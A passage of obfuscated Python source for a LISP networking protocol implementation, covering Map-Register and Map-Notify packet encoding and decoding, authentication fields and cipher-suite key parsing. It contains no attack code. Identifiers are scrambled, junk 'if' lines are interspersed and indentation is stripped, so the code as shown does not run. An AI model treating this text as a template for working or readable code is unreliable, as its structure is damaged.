if 84 - 84: i11iIiiIii + OoO0O00 * I1IiiI + I1ii11iIi11i / Ii1I
if 80 - 80: I1ii11iIi11i
if 67 - 67: II111iiii
if 2 - 2: o0oOOo0O0Ooo - O0 * Ii1I % IiII
IIIiIII1 = self . cipher_suite
IiiiIi1iiii11 += struct . pack ( "BBH" , IIIiIII1 , 0 , socket . htons ( iiii1II ) )
if 64 - 64: i1IIi . ooOoO0o
if 7 - 7: oO0o . iII111i - iII111i / I1Ii111 % Oo0Ooo
if 61 - 61: oO0o - I1ii11iIi11i / iII111i % I1ii11iIi11i + OoO0O00 / Oo0Ooo
if 10 - 10: i11iIiiIii / OoOoOO00
for IiIIi1IiiIiI in range ( 0 , iiii1II * 2 , 16 ) :
Oo000O000 = int ( OOoo000Ooo [ IiIIi1IiiIiI : IiIIi1IiiIiI + 16 ] , 16 )
IiiiIi1iiii11 += struct . pack ( "Q" , byte_swap_64 ( Oo000O000 ) )
if 27 - 27: I1IiiI / OoooooooOO
if 74 - 74: I1ii11iIi11i % I1Ii111 - OoO0O00 * I11i . OoooooooOO * OoO0O00
if 99 - 99: OoOoOO00 . iII111i - OoooooooOO - O0
if 6 - 6: OOooOOo
if 3 - 3: O0 - I1Ii111 * Ii1I * OOooOOo / Ii1I
if ( rloc_addr ) :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( rloc_addr . afi ) )
IiiiIi1iiii11 += rloc_addr . pack_address ( )
if 58 - 58: Ii1I * iIii1I11I1II1 + ooOoO0o . ooOoO0o
return ( IiiiIi1iiii11 )
if 74 - 74: ooOoO0o - o0oOOo0O0Ooo * IiII % ooOoO0o
if 93 - 93: iIii1I11I1II1 / OoOoOO00 % Oo0Ooo * I1Ii111 - OoO0O00 - o0oOOo0O0Ooo
def decode_lcaf ( self , packet , lcaf_len ) :
if 44 - 44: OoooooooOO
if 82 - 82: OoOoOO00 . OoOoOO00
if 10 - 10: Oo0Ooo * I1ii11iIi11i . oO0o . OoooooooOO . OOooOOo * I1ii11iIi11i
if 80 - 80: I1Ii111 + I11i . I1Ii111 + OOooOOo
if ( lcaf_len == 0 ) :
i1I1iii1I11II = "HHBBH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 85 - 85: i11iIiiIii . I11i + Ii1I / Ii1I
O0ooo0 , i1o00Oo , iI1IIiI111iII , i1o00Oo , lcaf_len = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 25 - 25: i11iIiiIii - OoOoOO00
if 32 - 32: i11iIiiIii
if ( iI1IIiI111iII != LISP_LCAF_SECURITY_TYPE ) :
packet = packet [ lcaf_len + 6 : : ]
return ( packet )
if 57 - 57: iIii1I11I1II1
lcaf_len = socket . ntohs ( lcaf_len )
packet = packet [ Iiiii : : ]
if 99 - 99: iII111i % o0oOOo0O0Ooo + iIii1I11I1II1
if 51 - 51: i1IIi % o0oOOo0O0Ooo - oO0o - IiII
if 14 - 14: ooOoO0o + Ii1I
if 45 - 45: oO0o + II111iiii . iII111i / I1ii11iIi11i
if 76 - 76: Ii1I + iII111i - IiII * iIii1I11I1II1 % i1IIi
if 72 - 72: ooOoO0o + II111iiii . O0 - iII111i / OoooooooOO . I1Ii111
iI1IIiI111iII = LISP_LCAF_SECURITY_TYPE
i1I1iii1I11II = "BBBBH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 28 - 28: iIii1I11I1II1 . O0
iiiI , i1o00Oo , IIIiIII1 , i1o00Oo , iiii1II = struct . unpack ( i1I1iii1I11II ,
packet [ : Iiiii ] )
if 41 - 41: Ii1I
if 49 - 49: Ii1I % II111iiii . Ii1I - o0oOOo0O0Ooo - I11i * IiII
if 47 - 47: O0 . o0oOOo0O0Ooo / Ii1I * iII111i
if 63 - 63: I1Ii111 - oO0o - iII111i - ooOoO0o / oO0o + OoO0O00
if 94 - 94: IiII / I1IiiI . II111iiii
if 32 - 32: oO0o . OOooOOo % OOooOOo . OoOoOO00
packet = packet [ Iiiii : : ]
iiii1II = socket . ntohs ( iiii1II )
if ( len ( packet ) < iiii1II ) : return ( None )
if 37 - 37: OOooOOo + O0 + OOooOOo . iII111i . o0oOOo0O0Ooo
if 78 - 78: I1IiiI / I11i + o0oOOo0O0Ooo . Oo0Ooo / O0
if 49 - 49: I1ii11iIi11i
if 66 - 66: o0oOOo0O0Ooo . I1ii11iIi11i
iI111I = [ LISP_CS_25519_CBC , LISP_CS_25519_GCM , LISP_CS_25519_CHACHA ,
LISP_CS_1024 ]
if ( IIIiIII1 not in iI111I ) :
lprint ( "Cipher-suites {} supported, received {}" . format ( iI111I ,
IIIiIII1 ) )
packet = packet [ iiii1II : : ]
return ( packet )
if 44 - 44: Ii1I . i11iIiiIii / Ii1I
if 32 - 32: Ii1I + IiII + I1ii11iIi11i
self . cipher_suite = IIIiIII1
if 79 - 79: i1IIi / Ii1I
if 81 - 81: iIii1I11I1II1
if 86 - 86: IiII % IiII % OoooooooOO
if 42 - 42: Oo0Ooo . oO0o + O0 / OOooOOo % OoooooooOO
if 19 - 19: ooOoO0o / Ii1I
OOoo000Ooo = 0
for IiIIi1IiiIiI in range ( 0 , iiii1II , 8 ) :
Oo000O000 = byte_swap_64 ( struct . unpack ( "Q" , packet [ IiIIi1IiiIiI : IiIIi1IiiIiI + 8 ] ) [ 0 ] )
OOoo000Ooo <<= 64
OOoo000Ooo |= Oo000O000
if 43 - 43: OoOoOO00 % Ii1I + Oo0Ooo - OoooooooOO . O0 % Oo0Ooo
self . remote_public_key = OOoo000Ooo
if 98 - 98: o0oOOo0O0Ooo * Oo0Ooo - Ii1I . ooOoO0o
if 2 - 2: Oo0Ooo - ooOoO0o % iIii1I11I1II1
if 88 - 88: I1Ii111 - OoO0O00
if 79 - 79: iII111i
if 45 - 45: II111iiii + iII111i . I11i . O0 * i1IIi - Ii1I
if ( self . curve25519 ) :
Oo000O000 = lisp_hex_string ( self . remote_public_key )
Oo000O000 = Oo000O000 . zfill ( 64 )
iII1iI = ""
for IiIIi1IiiIiI in range ( 0 , len ( Oo000O000 ) , 2 ) :
iII1iI += chr ( int ( Oo000O000 [ IiIIi1IiiIiI : IiIIi1IiiIiI + 2 ] , 16 ) )
if 98 - 98: II111iiii + I1IiiI - I1ii11iIi11i . Ii1I
self . remote_public_key = iII1iI
if 51 - 51: Ii1I + i11iIiiIii * OoO0O00 % Oo0Ooo / I1IiiI - iIii1I11I1II1
if 20 - 20: I1Ii111 . I11i . Ii1I + I11i - OOooOOo * oO0o
packet = packet [ iiii1II : : ]
return ( packet )
if 82 - 82: OoO0O00
if 78 - 78: II111iiii / I11i - i11iIiiIii + I1ii11iIi11i * Oo0Ooo
if 17 - 17: OoOoOO00
if 72 - 72: iII111i . Oo0Ooo - i11iIiiIii / I1IiiI
if 64 - 64: oO0o
if 80 - 80: o0oOOo0O0Ooo % iIii1I11I1II1
if 63 - 63: IiII * i11iIiiIii
if 86 - 86: I11i % I11i - OoOoOO00 + I1Ii111 / I1IiiI * OoooooooOO
class lisp_thread ( ) :
def __init__ ( self , name ) :
self . thread_name = name
self . thread_number = - 1
self . number_of_pcap_threads = 0
self . number_of_worker_threads = 0
self . input_queue = Queue . Queue ( )
self . input_stats = lisp_stats ( )
self . lisp_packet = lisp_packet ( None )
if 26 - 26: II111iiii * iII111i + o0oOOo0O0Ooo / O0 + i1IIi - I11i
if 56 - 56: OOooOOo
if 76 - 76: i1IIi % iIii1I11I1II1 - o0oOOo0O0Ooo + IiII - I11i
if 81 - 81: I1ii11iIi11i + OoooooooOO - OOooOOo * O0
if 100 - 100: iIii1I11I1II1 - OoOoOO00
if 28 - 28: Oo0Ooo . O0 . I11i
if 60 - 60: II111iiii + I1Ii111 / oO0o % OoooooooOO - i1IIi
if 57 - 57: ooOoO0o
if 99 - 99: Oo0Ooo + I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
if 52 - 52: I1ii11iIi11i
if 93 - 93: iII111i . i11iIiiIii
if 24 - 24: OOooOOo . OoO0O00 + I1Ii111 . oO0o - I1ii11iIi11i % iII111i
if 49 - 49: O0 . Oo0Ooo / Ii1I
if 29 - 29: I1ii11iIi11i / oO0o * O0 - i11iIiiIii - OoO0O00 + Ii1I
if 86 - 86: I1IiiI / I1ii11iIi11i * Ii1I % i11iIiiIii
if 20 - 20: iII111i . OoooooooOO + iII111i + ooOoO0o * I1ii11iIi11i
if 44 - 44: i11iIiiIii
if 69 - 69: OOooOOo * O0 + i11iIiiIii
class lisp_control_header ( ) :
def __init__ ( self ) :
self . type = 0
self . record_count = 0
self . nonce = 0
self . rloc_probe = False
self . smr_bit = False
self . smr_invoked_bit = False
self . ddt_bit = False
self . to_etr = False
self . to_ms = False
self . info_reply = False
if 65 - 65: O0 / iII111i . i1IIi * iII111i / iIii1I11I1II1 - oO0o
if 93 - 93: OoOoOO00 % i11iIiiIii - Ii1I % OoO0O00
def decode ( self , packet ) :
i1I1iii1I11II = "BBBBQ"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( False )
if 55 - 55: o0oOOo0O0Ooo . I1ii11iIi11i
o0OOOOOoO , Ooo0OO0O0oO , I11 , self . record_count , self . nonce = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 36 - 36: I1ii11iIi11i - OoooooooOO % ooOoO0o . i11iIiiIii - IiII * Oo0Ooo
if 14 - 14: OoOoOO00
self . type = o0OOOOOoO >> 4
if ( self . type == LISP_MAP_REQUEST ) :
self . smr_bit = True if ( o0OOOOOoO & 0x01 ) else False
self . rloc_probe = True if ( o0OOOOOoO & 0x02 ) else False
self . smr_invoked_bit = True if ( Ooo0OO0O0oO & 0x40 ) else False
if 34 - 34: OoOoOO00 * OoOoOO00
if ( self . type == LISP_ECM ) :
self . ddt_bit = True if ( o0OOOOOoO & 0x04 ) else False
self . to_etr = True if ( o0OOOOOoO & 0x02 ) else False
self . to_ms = True if ( o0OOOOOoO & 0x01 ) else False
if 71 - 71: II111iiii . Ii1I - OOooOOo . I1ii11iIi11i * II111iiii
if ( self . type == LISP_NAT_INFO ) :
self . info_reply = True if ( o0OOOOOoO & 0x08 ) else False
if 61 - 61: OoO0O00 * iIii1I11I1II1 / I1IiiI * I1ii11iIi11i
return ( True )
if 45 - 45: I1Ii111 * I11i / iIii1I11I1II1 / I1IiiI % II111iiii
if 49 - 49: Ii1I / iII111i . iII111i . iII111i + i11iIiiIii % I11i
def is_info_request ( self ) :
return ( ( self . type == LISP_NAT_INFO and self . is_info_reply ( ) == False ) )
if 7 - 7: IiII * ooOoO0o + OoOoOO00
if 22 - 22: iII111i
def is_info_reply ( self ) :
return ( True if self . info_reply else False )
if 48 - 48: I1ii11iIi11i . I1IiiI
if 73 - 73: O0 . I1Ii111 - OoooooooOO % I11i % i1IIi
def is_rloc_probe ( self ) :
return ( True if self . rloc_probe else False )
if 14 - 14: I1Ii111 + Ii1I * Oo0Ooo
if 49 - 49: Oo0Ooo
def is_smr ( self ) :
return ( True if self . smr_bit else False )
if 57 - 57: O0 * ooOoO0o - iII111i - iIii1I11I1II1 * iII111i
if 9 - 9: IiII . I11i
def is_smr_invoked ( self ) :
return ( True if self . smr_invoked_bit else False )
if 23 - 23: O0 % OoooooooOO - O0 . I1IiiI + i11iIiiIii
if 96 - 96: ooOoO0o % O0
def is_ddt ( self ) :
return ( True if self . ddt_bit else False )
if 51 - 51: I1IiiI - iII111i / I1ii11iIi11i . I1ii11iIi11i + I1ii11iIi11i
if 87 - 87: II111iiii . Ii1I * OoO0O00
def is_to_etr ( self ) :
return ( True if self . to_etr else False )
if 74 - 74: o0oOOo0O0Ooo % OoOoOO00 . iII111i % I1Ii111 . O0 % II111iiii
if 5 - 5: oO0o - OoooooooOO / OoOoOO00
def is_to_ms ( self ) :
return ( True if self . to_ms else False )
if 30 - 30: I11i % o0oOOo0O0Ooo + i1IIi * OoooooooOO * OoO0O00 - II111iiii
if 55 - 55: OoO0O00
if 20 - 20: ooOoO0o * I1Ii111 * o0oOOo0O0Ooo - ooOoO0o
if 32 - 32: Ii1I * oO0o
if 85 - 85: i11iIiiIii . OoO0O00 + OoO0O00
if 28 - 28: Oo0Ooo
if 62 - 62: Oo0Ooo + OoooooooOO / iII111i
if 60 - 60: Ii1I / OoOoOO00 . I11i % OOooOOo
if 61 - 61: O0 . Ii1I . O0 * i11iIiiIii * II111iiii / I1Ii111
if 69 - 69: I11i
if 17 - 17: I11i
if 38 - 38: I1Ii111 % OOooOOo
if 9 - 9: O0 . iIii1I11I1II1
if 44 - 44: I1ii11iIi11i % IiII
if 6 - 6: OoO0O00
if 82 - 82: iIii1I11I1II1 . I11i / IiII / OOooOOo * II111iiii % oO0o
if 62 - 62: II111iiii
if 96 - 96: I11i % OoOoOO00 * I1ii11iIi11i
if 94 - 94: Oo0Ooo - i1IIi . O0 % Oo0Ooo . ooOoO0o
if 63 - 63: i11iIiiIii % I1ii11iIi11i % I1IiiI . IiII * o0oOOo0O0Ooo + OOooOOo
if 77 - 77: o0oOOo0O0Ooo
if 63 - 63: ooOoO0o * oO0o + ooOoO0o * Ii1I + Oo0Ooo / I1ii11iIi11i
if 15 - 15: O0 . I1ii11iIi11i * I1ii11iIi11i
if 65 - 65: I1Ii111 + O0 % o0oOOo0O0Ooo
if 72 - 72: OOooOOo . OoOoOO00 / II111iiii
if 69 - 69: OOooOOo * II111iiii - ooOoO0o - i1IIi + i11iIiiIii
if 50 - 50: OoooooooOO * i1IIi / oO0o
if 83 - 83: i1IIi
if 38 - 38: OoooooooOO * iIii1I11I1II1
if 54 - 54: OoooooooOO . I1Ii111
if 71 - 71: Ii1I
if 31 - 31: I11i . i11iIiiIii . OoO0O00 * Oo0Ooo % Ii1I . o0oOOo0O0Ooo
if 92 - 92: OoooooooOO / O0 * i1IIi + iIii1I11I1II1
if 93 - 93: ooOoO0o % I1Ii111
if 46 - 46: I1ii11iIi11i * OoOoOO00 * IiII * I1ii11iIi11i . I1ii11iIi11i
if 43 - 43: ooOoO0o . i1IIi
if 68 - 68: IiII % Oo0Ooo . O0 - OoOoOO00 + I1ii11iIi11i . i11iIiiIii
if 45 - 45: I1IiiI
if 17 - 17: OoooooooOO - ooOoO0o + Ii1I . OoooooooOO % Oo0Ooo
if 92 - 92: I1Ii111 - OOooOOo % OoO0O00 - o0oOOo0O0Ooo % i1IIi
if 38 - 38: I1ii11iIi11i . I11i / OoOoOO00 % I11i
if 10 - 10: O0 . I1IiiI * o0oOOo0O0Ooo / iII111i
if 61 - 61: Oo0Ooo - I1Ii111
if 51 - 51: iII111i * ooOoO0o / O0 / O0
if 52 - 52: OoooooooOO % O0
if 56 - 56: oO0o - i1IIi * OoooooooOO - II111iiii
if 28 - 28: i1IIi / I11i . o0oOOo0O0Ooo
if 11 - 11: Oo0Ooo * OoooooooOO - i11iIiiIii
if 13 - 13: i11iIiiIii . O0 / OOooOOo * i1IIi
class lisp_map_register ( ) :
def __init__ ( self ) :
self . proxy_reply_requested = False
self . lisp_sec_present = False
self . xtr_id_present = False
self . map_notify_requested = False
self . mobile_node = False
self . merge_register_requested = False
self . use_ttl_for_timeout = False
self . map_register_refresh = False
self . record_count = 0
self . nonce = 0
self . alg_id = 0
self . key_id = 0
self . auth_len = 0
self . auth_data = 0
self . xtr_id = 0
self . site_id = 0
self . record_count = 0
self . sport = 0
self . encrypt_bit = 0
self . encryption_key_id = None
if 14 - 14: IiII + IiII . I11i / Ii1I . iIii1I11I1II1
if 10 - 10: II111iiii . OOooOOo / iII111i
def print_map_register ( self ) :
I1II = lisp_hex_string ( self . xtr_id )
if 91 - 91: o0oOOo0O0Ooo
oOOo0ooO0 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}" )
if 14 - 14: i11iIiiIii
lprint ( oOOo0ooO0 . format ( bold ( "Map-Register" , False ) , "P" if self . proxy_reply_requested else "p" ,
# I1ii11iIi11i
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_ttl_for_timeout else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node else "m" ,
"N" if self . map_notify_requested else "n" ,
"F" if self . map_register_refresh else "f" ,
"E" if self . encrypt_bit else "e" ,
self . record_count , lisp_hex_string ( self . nonce ) , self . key_id ,
self . alg_id , " (sha1)" if ( self . key_id == LISP_SHA_1_96_ALG_ID ) else ( " (sha2)" if ( self . key_id == LISP_SHA_256_128_ALG_ID ) else "" ) , self . auth_len , I1II , self . site_id ) )
if 42 - 42: I11i % Oo0Ooo + IiII - I11i . iIii1I11I1II1 - Ii1I
if 27 - 27: iII111i % Oo0Ooo . I1ii11iIi11i . i1IIi % OoOoOO00 . o0oOOo0O0Ooo
if 37 - 37: iII111i + I1Ii111 * Ii1I + IiII
if 39 - 39: O0 * Oo0Ooo - I1IiiI + Ii1I / II111iiii
def encode ( self ) :
iII = ( LISP_MAP_REGISTER << 28 ) | self . record_count
if ( self . proxy_reply_requested ) : iII |= 0x08000000
if ( self . lisp_sec_present ) : iII |= 0x04000000
if ( self . xtr_id_present ) : iII |= 0x02000000
if ( self . map_register_refresh ) : iII |= 0x1000
if ( self . use_ttl_for_timeout ) : iII |= 0x800
if ( self . merge_register_requested ) : iII |= 0x400
if ( self . mobile_node ) : iII |= 0x200
if ( self . map_notify_requested ) : iII |= 0x100
if ( self . encryption_key_id != None ) :
iII |= 0x2000
iII |= self . encryption_key_id << 14
if 66 - 66: ooOoO0o + oO0o % OoooooooOO
if 23 - 23: oO0o . OoOoOO00 + iIii1I11I1II1
if 17 - 17: IiII
if 12 - 12: i1IIi . OoO0O00
if 14 - 14: OOooOOo + II111iiii % OOooOOo . oO0o * ooOoO0o
if ( self . alg_id == LISP_NONE_ALG_ID ) :
self . auth_len = 0
else :
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
self . auth_len = LISP_SHA1_160_AUTH_DATA_LEN
if 54 - 54: ooOoO0o * I11i - I1Ii111
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
self . auth_len = LISP_SHA2_256_AUTH_DATA_LEN
if 15 - 15: iII111i / O0
if 61 - 61: i1IIi / i1IIi + ooOoO0o . I1Ii111 * ooOoO0o
if 19 - 19: o0oOOo0O0Ooo . II111iiii / i1IIi
IiiiIi1iiii11 = struct . pack ( "I" , socket . htonl ( iII ) )
IiiiIi1iiii11 += struct . pack ( "QBBH" , self . nonce , self . key_id , self . alg_id ,
socket . htons ( self . auth_len ) )
if 82 - 82: O0 / iII111i * OoO0O00 - I11i + Oo0Ooo
IiiiIi1iiii11 = self . zero_auth ( IiiiIi1iiii11 )
return ( IiiiIi1iiii11 )
if 47 - 47: I1ii11iIi11i * I1IiiI / I1ii11iIi11i + Ii1I * II111iiii
if 78 - 78: I1Ii111 - i1IIi + OoOoOO00 + Oo0Ooo * I1ii11iIi11i * o0oOOo0O0Ooo
def zero_auth ( self , packet ) :
OoO00oo00 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
oooO = ""
II111iiI1Ii1 = 0
if ( self . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
oooO = struct . pack ( "QQI" , 0 , 0 , 0 )
II111iiI1Ii1 = struct . calcsize ( "QQI" )
if 58 - 58: OoooooooOO * i1IIi * OoOoOO00
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
oooO = struct . pack ( "QQQQ" , 0 , 0 , 0 , 0 )
II111iiI1Ii1 = struct . calcsize ( "QQQQ" )
if 99 - 99: Oo0Ooo
packet = packet [ 0 : OoO00oo00 ] + oooO + packet [ OoO00oo00 + II111iiI1Ii1 : : ]
return ( packet )
if 72 - 72: Oo0Ooo / II111iiii * ooOoO0o * I1ii11iIi11i - IiII / I1Ii111
if 82 - 82: I1IiiI / I11i
def encode_auth ( self , packet ) :
OoO00oo00 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
II111iiI1Ii1 = self . auth_len
oooO = self . auth_data
packet = packet [ 0 : OoO00oo00 ] + oooO + packet [ OoO00oo00 + II111iiI1Ii1 : : ]
return ( packet )
if 6 - 6: Ii1I / ooOoO0o / i11iIiiIii % o0oOOo0O0Ooo
if 69 - 69: I1Ii111
def decode ( self , packet ) :
OoO = packet
i1I1iii1I11II = "I"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( [ None , None ] )
if 55 - 55: I1Ii111
iII = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
iII = socket . ntohl ( iII [ 0 ] )
packet = packet [ Iiiii : : ]
if 29 - 29: Oo0Ooo
i1I1iii1I11II = "QBBH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( [ None , None ] )
if 97 - 97: OoO0O00 * I1Ii111
self . nonce , self . key_id , self . alg_id , self . auth_len = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 80 - 80: OOooOOo * OOooOOo
if 5 - 5: OoooooooOO - iII111i - i11iIiiIii
self . auth_len = socket . ntohs ( self . auth_len )
self . proxy_reply_requested = True if ( iII & 0x08000000 ) else False
if 53 - 53: iII111i * OoO0O00 / I1ii11iIi11i + I1IiiI + OoooooooOO
self . lisp_sec_present = True if ( iII & 0x04000000 ) else False
self . xtr_id_present = True if ( iII & 0x02000000 ) else False
self . use_ttl_for_timeout = True if ( iII & 0x800 ) else False
self . map_register_refresh = True if ( iII & 0x1000 ) else False
self . merge_register_requested = True if ( iII & 0x400 ) else False
self . mobile_node = True if ( iII & 0x200 ) else False
self . map_notify_requested = True if ( iII & 0x100 ) else False
self . record_count = iII & 0xff
if 47 - 47: I1Ii111
if 65 - 65: Ii1I
if 71 - 71: I1Ii111 % I1Ii111 . oO0o + i11iIiiIii - i11iIiiIii
if 16 - 16: iIii1I11I1II1 / I1IiiI / I1Ii111 - i11iIiiIii . ooOoO0o / OOooOOo
self . encrypt_bit = True if iII & 0x2000 else False
if ( self . encrypt_bit ) :
self . encryption_key_id = ( iII >> 14 ) & 0x7
if 13 - 13: o0oOOo0O0Ooo % O0 - I1Ii111 * OoooooooOO / Oo0Ooo - OoooooooOO
if 78 - 78: oO0o % OoooooooOO
if 73 - 73: I1IiiI % ooOoO0o % IiII + i1IIi - OoooooooOO / oO0o
if 78 - 78: OoooooooOO % oO0o - i11iIiiIii
if 37 - 37: IiII % Ii1I % i1IIi
if ( self . xtr_id_present ) :
if ( self . decode_xtr_id ( OoO ) == False ) : return ( [ None , None ] )
if 23 - 23: ooOoO0o - O0 + i11iIiiIii
if 98 - 98: OoooooooOO
packet = packet [ Iiiii : : ]
if 61 - 61: o0oOOo0O0Ooo . IiII . O0 + OoooooooOO + O0
if 65 - 65: i1IIi * OOooOOo * OoooooooOO - IiII . iII111i - OoO0O00
if 71 - 71: Ii1I * OoOoOO00
if 33 - 33: i1IIi . i1IIi * OoooooooOO % I1Ii111 * o0oOOo0O0Ooo
if ( self . auth_len != 0 ) :
if ( len ( packet ) < self . auth_len ) : return ( [ None , None ] )
if 64 - 64: ooOoO0o / ooOoO0o + I1ii11iIi11i * OOooOOo % OOooOOo
if ( self . alg_id not in ( LISP_NONE_ALG_ID , LISP_SHA_1_96_ALG_ID ,
LISP_SHA_256_128_ALG_ID ) ) :
lprint ( "Invalid authentication alg-id: {}" . format ( self . alg_id ) )
return ( [ None , None ] )
if 87 - 87: OoO0O00 * Oo0Ooo
if 83 - 83: i1IIi * I1Ii111 - IiII / Ii1I
II111iiI1Ii1 = self . auth_len
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
Iiiii = struct . calcsize ( "QQI" )
if ( II111iiI1Ii1 < Iiiii ) :
lprint ( "Invalid sha1-96 authentication length" )
return ( [ None , None ] )
if 48 - 48: oO0o . II111iiii - OoOoOO00 % i1IIi . OoOoOO00
I1IiiIiIIi1Ii , oo00oo , OOOO0oO0OOo0o = struct . unpack ( "QQI" , packet [ : II111iiI1Ii1 ] )
OoOO = ""
elif ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
Iiiii = struct . calcsize ( "QQQQ" )
if ( II111iiI1Ii1 < Iiiii ) :
lprint ( "Invalid sha2-256 authentication length" )
return ( [ None , None ] )
if 19 - 19: iIii1I11I1II1 . OoO0O00 / OoooooooOO
I1IiiIiIIi1Ii , oo00oo , OOOO0oO0OOo0o , OoOO = struct . unpack ( "QQQQ" ,
packet [ : II111iiI1Ii1 ] )
else :
lprint ( "Unsupported authentication alg-id value {}" . format ( self . alg_id ) )
if 2 - 2: O0 - O0 % I1Ii111 / I1ii11iIi11i
return ( [ None , None ] )
if 76 - 76: OoO0O00 * oO0o - OoO0O00
self . auth_data = lisp_concat_auth_data ( self . alg_id , I1IiiIiIIi1Ii , oo00oo ,
OOOO0oO0OOo0o , OoOO )
OoO = self . zero_auth ( OoO )
packet = packet [ self . auth_len : : ]
if 57 - 57: OoooooooOO / OoOoOO00 + oO0o . Ii1I
return ( [ OoO , packet ] )
if 14 - 14: i11iIiiIii % OOooOOo * o0oOOo0O0Ooo * OoOoOO00
if 55 - 55: I1Ii111 * OOooOOo * I1Ii111
def encode_xtr_id ( self , packet ) :
oo0 = self . xtr_id >> 64
i11Iiiiii11II = self . xtr_id & 0xffffffffffffffff
oo0 = byte_swap_64 ( oo0 )
i11Iiiiii11II = byte_swap_64 ( i11Iiiiii11II )
O0O0oOO = byte_swap_64 ( self . site_id )
packet += struct . pack ( "QQQ" , oo0 , i11Iiiiii11II , O0O0oOO )
return ( packet )
if 40 - 40: OoO0O00 - OoO0O00
if 58 - 58: IiII * iII111i . I1IiiI + OOooOOo
def decode_xtr_id ( self , packet ) :
Iiiii = struct . calcsize ( "QQQ" )
if ( len ( packet ) < Iiiii ) : return ( [ None , None ] )
packet = packet [ len ( packet ) - Iiiii : : ]
oo0 , i11Iiiiii11II , O0O0oOO = struct . unpack ( "QQQ" ,
packet [ : Iiiii ] )
oo0 = byte_swap_64 ( oo0 )
i11Iiiiii11II = byte_swap_64 ( i11Iiiiii11II )
self . xtr_id = ( oo0 << 64 ) | i11Iiiiii11II
self . site_id = byte_swap_64 ( O0O0oOO )
return ( True )
if 4 - 4: OoO0O00 . OOooOOo + i11iIiiIii + ooOoO0o % oO0o - ooOoO0o
if 45 - 45: oO0o
if 66 - 66: OOooOOo
if 23 - 23: I1ii11iIi11i % I11i
if 18 - 18: OoooooooOO . i1IIi + II111iiii
if 99 - 99: I1Ii111 - I1ii11iIi11i - I1IiiI - I1Ii111 + OoO0O00 + II111iiii
if 34 - 34: I1Ii111 * I11i
if 31 - 31: IiII . oO0o
if 40 - 40: Ii1I - I11i / II111iiii * i1IIi + IiII * II111iiii
if 53 - 53: I1ii11iIi11i - i11iIiiIii . OoO0O00 / OoOoOO00 - I1Ii111
if 99 - 99: Ii1I - IiII - i1IIi / i11iIiiIii . IiII
if 58 - 58: OOooOOo
if 12 - 12: I1IiiI . o0oOOo0O0Ooo * OoooooooOO
if 64 - 64: OoOoOO00 + IiII - i1IIi . II111iiii . OoO0O00
if 31 - 31: oO0o . iII111i - I11i . iIii1I11I1II1 + I11i . OoOoOO00
if 86 - 86: I1ii11iIi11i - I1ii11iIi11i / iII111i - I1ii11iIi11i * iII111i + I1Ii111
if 61 - 61: Oo0Ooo / II111iiii / Oo0Ooo / i1IIi . Oo0Ooo - IiII
if 30 - 30: OoooooooOO % OOooOOo
if 14 - 14: OoOoOO00 / OoO0O00 / i11iIiiIii - OoOoOO00 / o0oOOo0O0Ooo - OOooOOo
if 81 - 81: iII111i % Ii1I . ooOoO0o
if 66 - 66: I1ii11iIi11i * Ii1I / OoooooooOO * O0 % OOooOOo
if 49 - 49: II111iiii . I1IiiI * O0 * Ii1I / I1Ii111 * OoooooooOO
if 82 - 82: Oo0Ooo / Ii1I / Ii1I % Ii1I
if 20 - 20: ooOoO0o
if 63 - 63: iIii1I11I1II1 . OoO0O00
if 100 - 100: i1IIi * i1IIi
if 26 - 26: OOooOOo . OoO0O00 % OoOoOO00
if 94 - 94: IiII
if 15 - 15: Ii1I - IiII / O0
if 28 - 28: I1Ii111 . i1IIi / I1ii11iIi11i
if 77 - 77: i11iIiiIii / I1Ii111 / i11iIiiIii % OoOoOO00 - I1Ii111
if 80 - 80: I1Ii111 % OoOoOO00 . OoooooooOO . II111iiii % IiII
if 6 - 6: I1Ii111 % IiII / Ii1I + I1Ii111 . oO0o
class lisp_map_notify ( ) :
def __init__ ( self , lisp_sockets ) :
self . etr = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . etr_port = 0
self . retransmit_timer = None
self . lisp_sockets = lisp_sockets
self . retry_count = 0
self . record_count = 0
self . alg_id = LISP_NONE_ALG_ID
self . key_id = 0
self . auth_len = 0
self . auth_data = ""
self . nonce = 0
self . nonce_key = ""
self . packet = None
self . site = ""
self . map_notify_ack = False
self . eid_records = ""
self . eid_list = [ ]
if 70 - 70: iIii1I11I1II1 / Ii1I
if 61 - 61: O0 * o0oOOo0O0Ooo + I1Ii111 - OOooOOo . I1IiiI - IiII
def print_notify ( self ) :
oooO = binascii . hexlify ( self . auth_data )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID and len ( oooO ) != 40 ) :
oooO = self . auth_data
elif ( self . alg_id == LISP_SHA_256_128_ALG_ID and len ( oooO ) != 64 ) :
oooO = self . auth_data
if 7 - 7: I1ii11iIi11i
oOOo0ooO0 = ( "{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
